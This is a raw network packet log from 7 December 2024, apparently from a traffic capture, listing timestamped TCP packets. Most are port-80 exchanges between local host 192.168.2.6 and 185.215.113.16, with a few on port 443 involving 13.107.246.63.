Dec 7, 2024 10:52:02.165564060 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.165795088 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.165884018 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.166573048 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.166651964 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.166732073 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.166781902 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.167618036 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.167681932 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.167887926 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.168200970 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.168668985 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.168718100 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.168734074 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.168765068 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.169821978 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.169869900 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.169895887 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.169940948 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.170886993 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.170900106 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.170958996 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.171848059 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.171895027 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.171926022 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.171968937 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.172899961 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.172955036 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.172961950 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.173010111 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.173986912 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.174005985 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.174122095 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.174993038 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.175041914 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.175075054 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.175118923 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.176122904 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.176143885 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.176177025 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.176192045 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.177247047 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.177258968 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.177350998 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.178240061 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.178294897 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.178306103 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.178352118 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.179375887 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.179388046 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.179495096 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.180274010 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.180320978 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.180402040 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.180449963 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.181375027 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.181555033 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.181646109 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.181690931 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.182394028 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.182440996 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.182501078 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.182629108 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.183465004 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.183517933 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.183526993 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.183568954 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.184586048 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.184643984 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.184645891 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.184688091 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.185565948 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.185615063 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.185628891 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.185693026 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.186705112 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.186774015 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.186799049 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.186815977 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.187803984 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.187853098 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.187913895 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.187957048 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.188724041 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.188771009 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.188842058 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.188891888 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.189800024 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.189862967 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.189877987 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.189918995 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.190840006 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.190922022 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.190954924 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.190993071 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.191911936 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.191984892 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.192006111 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.192049026 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.193017960 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.193078041 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.193119049 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.193202019 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.194087982 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.194169998 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.194355965 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.194405079 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.195071936 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.195118904 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.195137978 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.195190907 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.196135044 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.196178913 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.196234941 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.197199106 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.197246075 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.197248936 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.197285891 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.198254108 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.198312044 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.198424101 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.198481083 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.199310064 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.199419975 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.199477911 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.199553013 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.200342894 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.200438023 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.200442076 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.200479031 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.201421976 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.201468945 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.201607943 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.201657057 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.202439070 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.202486038 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.202586889 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.202677965 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.203500032 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.203553915 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.203612089 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.203742027 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.204582930 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.204627037 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.204710007 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.204762936 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.205615044 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.205666065 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.205708981 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.205751896 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.206806898 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.206902027 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.206954956 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.207853079 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.207911015 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.207921028 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.207950115 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.208844900 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.208899975 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.208937883 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.209089994 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.209822893 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.209877968 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.271332979 CET	443	49854	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.271918058 CET	49854	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.271931887 CET	443	49854	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.272416115 CET	49854	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.272423029 CET	443	49854	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.272757053 CET	443	49855	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.273082018 CET	49855	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.273093939 CET	443	49855	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.273515940 CET	49855	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.273520947 CET	443	49855	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.346365929 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.346455097 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.346472979 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.346525908 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.346865892 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.346980095 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.347359896 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.347481012 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.348030090 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.348045111 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.348082066 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.349075079 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.349127054 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.349231958 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.349535942 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.350089073 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.350140095 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.350157022 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.350261927 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.351157904 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.351195097 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.351217985 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.351243019 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.352338076 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.352353096 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.352410078 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.353565931 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.353580952 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.353626966 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.354249001 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.354348898 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.354401112 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.355302095 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.355360031 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.355401039 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.355479002 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.356384993 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.356518984 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.356540918 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.356560946 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.357490063 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.357542038 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.357687950 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.357801914 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.358556986 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.358613014 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.358694077 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.358913898 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.359625101 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.359675884 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.359702110 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.359776974 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.360626936 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.360682964 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.360707045 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.360754013 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.361666918 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.361726999 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.361789942 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.361869097 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.362692118 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.362757921 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.362808943 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.362857103 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.363760948 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.363818884 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.363898039 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.363946915 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.364970922 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.365021944 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.365076065 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.365120888 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.365899086 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.366014957 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.366065025 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.366956949 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.367017031 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.367037058 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.367144108 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.368021011 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.368067980 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.368112087 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.368156910 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.369048119 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.369092941 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.369113922 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.369153023 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.370124102 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.370182991 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.370239019 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.370275974 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.371190071 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.371267080 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.371279955 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.371328115 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.372256994 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.372312069 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.372452021 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.372498989 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.373285055 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.373342037 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.373399019 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.373442888 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.374346972 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.374399900 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.374476910 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.374537945 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.375432014 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.375520945 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.375566959 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.375636101 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.376511097 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.376581907 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.376740932 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.376789093 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.377521992 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.377572060 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.377723932 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.377772093 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.378566980 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.378618002 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.378716946 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.378793955 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.379663944 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.379715919 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.379735947 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.379775047 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.380717039 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.380764961 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.380868912 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.380918026 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.381721020 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.381767988 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.381788969 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.381831884 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.382821083 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.382870913 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.382890940 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.382935047 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.383861065 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.383909941 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.383934021 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.383980036 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.384959936 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.385004997 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.385173082 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.385287046 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.386003017 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.386054039 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.386190891 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.386348963 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.387084961 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.387132883 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.387263060 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.387423992 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.388102055 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.388144016 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.388170958 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.388211012 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.389205933 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.389256001 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.389273882 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.389317989 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.390196085 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.390244961 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.390275002 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.390291929 CET	49852	80	192.168.2.6	185.215.113.16
